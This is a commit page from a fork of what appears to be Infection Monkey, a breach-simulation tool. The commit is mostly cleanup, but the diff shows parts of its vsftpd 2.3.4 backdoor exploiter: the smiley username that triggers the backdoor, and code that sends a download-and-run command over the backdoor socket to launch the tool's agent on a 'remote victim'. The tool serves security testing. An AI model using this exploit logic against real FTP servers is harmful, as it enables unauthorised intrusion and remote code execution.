p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

Post merge fixes

This commit is contained in:
VakarisZ 2019-05-29 09:56:57 +03:00
parent 61e04c796d
commit b465c27e20
3 changed files with 4275 additions and 3696 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
monkey/infection_monkey/exploit/vsftpd.py
View File

@ -4,19 +4,12 @@
only vulnerable version is "2.3.4" only vulnerable version is "2.3.4"
""" """
import StringIO
import logging
import paramiko
import socket import socket
import time import time
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit import HostExploiter from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import build_monkey_commandline from infection_monkey.exploit.tools import build_monkey_commandline
from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
from infection_monkey.model import MONKEY_ARG, CHMOD_MONKEY, RUN_MONKEY, WGET_HTTP_UPLOAD, DOWNLOAD_TIMEOUT from infection_monkey.model import MONKEY_ARG, CHMOD_MONKEY, RUN_MONKEY, WGET_HTTP_UPLOAD, DOWNLOAD_TIMEOUT
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.exploit.web_rce import WebRCE
from logging import getLogger from logging import getLogger
LOG = getLogger(__name__) LOG = getLogger(__name__)
@ -33,8 +26,10 @@ USERNAME = b'USER D3fa1t:)' # Ftp Username should end with :) to tri
PASSWORD = b'PASS please' # Ftp Password PASSWORD = b'PASS please' # Ftp Password
FTP_TIME_BUFFER = 1 # In seconds FTP_TIME_BUFFER = 1 # In seconds
class VSFTPDExploiter(HostExploiter): class VSFTPDExploiter(HostExploiter):
_TARGET_OS_TYPE = ['linux'] _TARGET_OS_TYPE = ['linux']
_EXPLOITED_SERVICE = 'VSFTPD'
def __init__(self, host): def __init__(self, host):
self._update_timestamp = 0 self._update_timestamp = 0
@ -136,14 +131,13 @@ class VSFTPDExploiter(HostExploiter):
run_monkey = RUN_MONKEY % {'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters} run_monkey = RUN_MONKEY % {'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters}
# Set unlimited to memory # Set unlimited to memory
run_monkey = ULIMIT_V + UNLIMITED + run_monkey # we don't have to revert the ulimit because it just applies to the shell obtained by our exploit # we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + '\n') run_monkey = str.encode(str(run_monkey) + '\n')
time.sleep(FTP_TIME_BUFFER) time.sleep(FTP_TIME_BUFFER)
if backdoor_socket.send(run_monkey): if backdoor_socket.send(run_monkey):
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, self.host, run_monkey) LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux,
self.host, run_monkey)
return True return True
else: else:
return False return False

1
monkey/monkey_island/cc/app.py
View File

@ -135,7 +135,6 @@ def init_api_resources(api):
api.add_resource(AttackConfiguration, '/api/attack') api.add_resource(AttackConfiguration, '/api/attack')
api.add_resource(AttackTelem, '/api/attack/<string:technique>') api.add_resource(AttackTelem, '/api/attack/<string:technique>')
api.add_resource(AttackReport, '/api/attack/report') api.add_resource(AttackReport, '/api/attack/report')
api.add_resource(AttackConfiguration, '/api/attack')
api.add_resource(VersionUpdate, '/api/version-update', '/api/version-update/') api.add_resource(VersionUpdate, '/api/version-update', '/api/version-update/')

7900
monkey/monkey_island/cc/ui/package-lock.json generated
View File

File diff suppressed because it is too large Load Diff